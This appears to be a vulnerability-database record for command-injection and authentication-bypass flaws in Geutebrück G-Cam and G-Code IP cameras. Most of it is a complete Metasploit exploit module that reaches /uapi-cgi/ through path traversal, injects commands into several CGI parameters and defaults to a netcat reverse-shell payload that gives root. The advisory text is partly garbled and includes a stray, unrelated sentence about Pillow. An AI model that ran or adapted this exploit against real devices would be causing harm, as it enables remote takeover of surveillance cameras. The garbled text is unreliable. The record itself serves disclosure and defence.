ID

VAR-202109-0849

CVE

CVE-2021-33553

TITLE

GEUTEBRUCK  Made  G-Cam E2  and  G-Code  Multiple vulnerabilities in

DESCRIPTION

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

operating system commend injection

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.

SOURCES

LAST UPDATE DATE

2025-01-30T20:38:58.222000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE